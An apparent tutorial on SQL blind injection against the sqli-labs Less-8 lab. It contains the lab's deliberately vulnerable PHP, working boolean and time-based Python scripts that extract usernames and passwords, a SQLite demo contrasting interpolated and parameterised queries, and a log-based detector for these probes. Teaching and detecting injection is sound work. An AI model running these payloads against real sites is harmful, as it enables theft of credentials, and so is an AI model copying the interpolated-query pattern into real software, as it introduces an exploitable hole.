Readers who do not yet understand SQL injection can refer to the earlier article "SQL Injection Basics"; this article mainly covers SQL blind injection.

0x00 Introduction to blind injection:

As the name suggests, it is injecting like a blind person (what kind of explanation is that...). In plain terms: when we find a SQL injection but cannot get the result of the SQL query echoed back in the page, then apart from the file-writing approach covered earlier, what remains is blind injection. In blind injection we infer the data from factors such as the status the server returns, and assemble those inferences into the data we want.

0x01 Prerequisite knowledge for blind injection:

A few built-in functions commonly used in SQL blind injection; let's go through them:

- length(str): returns the length of the string str.
- substr(str, pos, len): returns len characters of str starting at position pos. Note that pos starts at 1, not at 0 as with array indexes.
- mid(str, pos, len): same as above, extracts a substring.
- ascii(str): returns the ASCII code of the leftmost character of the string str.
- asc(): same as above.
- ord(str): same as above, returns the ASCII code.
- if(a, b, c): a is the condition; if a is true, returns b, otherwise returns c. For example, if(1>2, 1, 0) returns 0.

0x02 Boolean blind injection based on page features:

Let's again use the sqli-labs platform, which has plenty of variations. Start with the simplest one, Less-8, a single-quote boolean blind injection, and analyse its source:

```php
<?php
// trimmed relative to the original file for readability
// including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0); // suppress error output

if (isset($_GET['id'])) // if an id parameter was passed in
{
    $id = $_GET['id'];
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) // if a row was found, run the following
    {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    }
    else // otherwise run this; the two branches return different page structures, which is what we use as the decision criterion for blind injection
    {
        echo '<font size="5" color="#FFFF00">';
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}
?>
```
The page structure the server returns tells us whether the predicate in the current SQL injection is correct: one version of the page contains the word "You", and we can use that as the feature. Construct a statement whose condition holds, and the if(true) page is returned:
[screenshot (alt text: "WAF丨SQL从盲注学习到EXP编写-V站"): page returned when the condition holds]
When the condition is not met, the if(false) page is returned:
[screenshot: page returned when the condition fails]
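To make the oracle concrete and put the fix next to it, here is an added example that is not part of the article or of sqli-labs. It rebuilds the Less-8 query against an in-memory SQLite database: `lookup_vulnerable` interpolates the id string into the SQL text exactly as the PHP above does, `lookup_safe` binds it as a parameter, and `boolean_probe` submits the article's ascii(substr(...)) predicate to either one. The table, the sample row, the registered `ascii()` function and the `--` comment (SQLite has no `ascii()` and does not accept MySQL's `#` comment) are constructed assumptions for the simulation.

```python
import sqlite3

# Alphabet the article's script iterates over
FUZZ = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'


def make_db():
    """In-memory stand-in for the sqli-labs users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    # SQLite lacks MySQL's ascii(); register an equivalent so the article's predicate parses
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'secret1')")  # constructed row
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as Less-8: the parameter becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn, user_id):
    """Hardened form: the value is bound, so it can never be parsed as SQL."""
    row = conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()
    return row is not None


def boolean_probe(conn, lookup, column, pos, ch):
    """Ask the page's yes/no question: is character `pos` of `column` equal to `ch`?"""
    # MySQL would end the payload with '#'; SQLite uses '--' for a line comment
    payload = "1' and ascii(substr((select %s from users limit 0,1),%d,1))=%d -- " % (
        column, pos, ord(ch))
    return lookup(conn, payload)


def first_char(conn, lookup, column):
    """The article's loop for one position; returns the leaked character or None."""
    for ch in FUZZ:
        if boolean_probe(conn, lookup, column, 1, ch):
            return ch
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", first_char(db, lookup_vulnerable, "username"))  # 'a'
    print("parameterised lookup leaks:", first_char(db, lookup_safe, "username"))  # None
```

With the interpolated query the probe answers "yes" for exactly one character per position, which is the whole oracle; with the bound parameter every probe answers "no" (the literal string is compared against the id column and matches nothing), so the response no longer depends on the data and there is nothing to enumerate.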
Below is a simple script to explain this concretely:

```python
# name: SQL blind injection
# author: DYBOY
# time: 2018-07-01
# description: reference script for learning SQL blind injection
import requests
import re

req = requests.Session()
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

# characters to test during blind injection
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
# reference injected statement: id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=97+%23
# reference injected statement 2: id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=ascii("a")+%23

username = "username:"
password = "password:"

# recover the username
for i in range(1, 6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+username+from+users+limit+0,1)," + str(i) + ",1))=" + str(ord(key)) + "+%23"
        html = req.get(url, headers=header, timeout=8)
        guize = r'You'  # the page feature that marks the if(true) branch
        if re.findall(guize, html.text):
            username = username + key
print(username)

# recover the password
for j in range(1, 6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+password+from+users+limit+0,1)," + str(j) + ",1))=" + str(ord(key)) + "+%23"
        html = req.get(url, headers=header, timeout=8)
        guize = r'You'
        if re.findall(guize, html.text):
            password = password + key
print(password)
```
The run output is as follows:
[screenshot: script output]
This script decides based on page features; next, let's see how to write a time-based blind injection script!

0x03 Time-based injection:

When the data a page returns does not change at all and error-based injection does not work either, time-based blind injection comes into play. First look at a SQL statement:

```sql
if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)
```

The effect of executing this statement is: if the if condition holds, the server delays 3 s before returning the page to the client; otherwise the page is returned in the normal time. With this condition we can carry out time-based blind injection. The time-based script is as follows:

```python
# name: SQL time-based blind injection
# author: DYBOY
# time: 2018-07-01
# description: reference script for learning SQL time-based blind injection
import requests
import time

req = requests.Session()
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

# characters to test during blind injection
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ@_.<>?/;!$#{}-'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
# reference injected statement: id=1%27+and+if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)+%23

username = "username:"
password = "password:"

# recover the username
for i in range(1, 6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+username+from+users+limit+0,1)," + str(i) + ",1))=" + str(ord(key)) + ",sleep(3),0)+%23"
        html = req.get(url, headers=header, timeout=8)
        if (time.time() - start_time) >= 3:  # a response delayed by 3 s or more means the condition held
            username = username + key
print(username)

# recover the password
for i in range(1, 6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+password+from+users+limit+0,1)," + str(i) + ",1))=" + str(ord(key)) + ",sleep(3),0)+%23"
        html = req.get(url, headers=header, timeout=8)
        if (time.time() - start_time) >= 3:
            password = password + key
print(password)
```
Run output:
[screenshot: script output]
That's right: time-based blind injection simply changes the decision criterion to time, and it tends to be more widely applicable.
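Both scripts leave a very recognisable trail: hundreds of requests from one client to one path whose query string differs only in a position and an ASCII value, carrying ascii(substr(...)) and, for the time-based variant, sleep(). The following added example (not from the article) is the detection side of that: it parses combined-style web server access log lines, URL-decodes the query string, classifies each request as a boolean or time-based probe using the two probe shapes from the scripts above, and then counts hits per client so a single stray match does not raise an alert. The log lines, hosts and timestamps are constructed; benchmark() is matched alongside sleep() because it is MySQL's other delay primitive, although the article itself only uses sleep().

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (client, timestamp, request line, status, size).
# 10.0.0.9 sends the probes shown in the article's scripts; 10.0.0.5 is normal traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2018:10:00:01 +0800] "GET /Less-8/index.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2018:10:00:02 +0800] "GET /Less-8/index.php?id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=97+%23 HTTP/1.1" 200 498
10.0.0.9 - - [01/Jul/2018:10:00:02 +0800] "GET /Less-8/index.php?id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=98+%23 HTTP/1.1" 200 498
10.0.0.9 - - [01/Jul/2018:10:00:03 +0800] "GET /Less-8/index.php?id=1%27+and+if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)+%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jul/2018:10:00:04 +0800] "GET /Less-8/index.php?id=2 HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Probe shapes from the article, matched against the URL-decoded query string.
# Time-based probes also contain ascii(substr(...)), so they are checked first.
TIME_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
BOOL_RE = re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I)


def classify(query):
    """Return 'time', 'boolean' or None for one decoded query string."""
    if TIME_RE.search(query):
        return "time"
    if BOOL_RE.search(query):
        return "boolean"
    return None


def scan_log(text):
    """Parse every log line and return a finding dict per flagged request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        parts = urlsplit(m.group("target"))
        decoded = unquote_plus(parts.query)  # turns %27 into ' and + into a space
        technique = classify(decoded)
        if technique:
            findings.append({
                "client": m.group("client"),
                "time": m.group("ts"),
                "path": parts.path,
                "technique": technique,
                "query": decoded,
            })
    return findings


def suspicious_clients(findings, min_hits=2):
    """Clients with at least min_hits flagged requests; one hit alone is weak evidence."""
    counts = Counter(f["client"] for f in findings)
    return {client: n for client, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["technique"], h["path"], h["query"])
    print("suspicious:", suspicious_clients(hits))
```

Two caveats for real deployments: the time-based probe is only recognisable here because sleep() is visible in the query, so if the server logs the request duration (Apache's %D, nginx's $request_time) it is worth also alerting on many slow responses to one path from one client; and matching on the decoded query rather than the raw line matters, because the scripts above send the payload URL-encoded and a raw-line match for "ascii(substr(" would still work here but would miss a double-encoded variant.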